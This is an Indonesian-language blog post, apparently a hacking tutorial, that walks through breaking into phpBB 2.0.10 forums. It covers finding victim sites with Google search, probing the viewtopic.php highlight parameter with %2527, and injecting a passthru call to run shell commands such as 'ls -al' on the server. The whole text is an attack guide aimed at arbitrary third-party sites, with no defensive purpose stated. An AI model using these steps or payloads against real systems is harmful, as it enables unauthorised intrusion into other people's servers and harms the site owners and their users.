langsung saja ini langkah-langkah nya :
Hacking PHPBB 2.0.10
hacking phpbb 2.0.10
1. Cari sasaran menggunakan paman google. keywordnya = phpbb 2.0
Jangan menggunakan keyword viewtopic karena gak akan diijinkan.
2. Kunjungi alamat forum yang didapat. Lihat dan kunjungi hingga pada bagian address tertulis
http://sasaran.com/viewtopic.php?t=4(angka 4 bisa saja lain)
3. Kemudian pada bagian address coba tambahkan &highlight=%2527
http://sasaran.com/viewtopic.php?t=4&highlight=%2527
4. Jika yang muncul adalah error, maka bererti forumnya vuln (bolong). Jika tidak, cari sasaran lain. :-)
5. Setelah Muncul error coba tambahkan lagi menjadi
http://sasaran.com/viewtopic.php?t=t=4&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=ls -al
6. Jika yang muncul adalah daftar nama file dan direktori, selamat anda telah berhasil masuk ke dalam sysytem sasaran
7. Jika ada error tetapi eksekusi perintah cmd= tidak berjalan kemungkinan fungsi passthru sudah dimatikan oleh admin. Cari sasaran lain.
Nah silahkan di pelajari lebih dalam dan semoga tutorial ini bsa bermantaaf dan berguna ... amin.
Tidak ada komentar:
Posting Komentar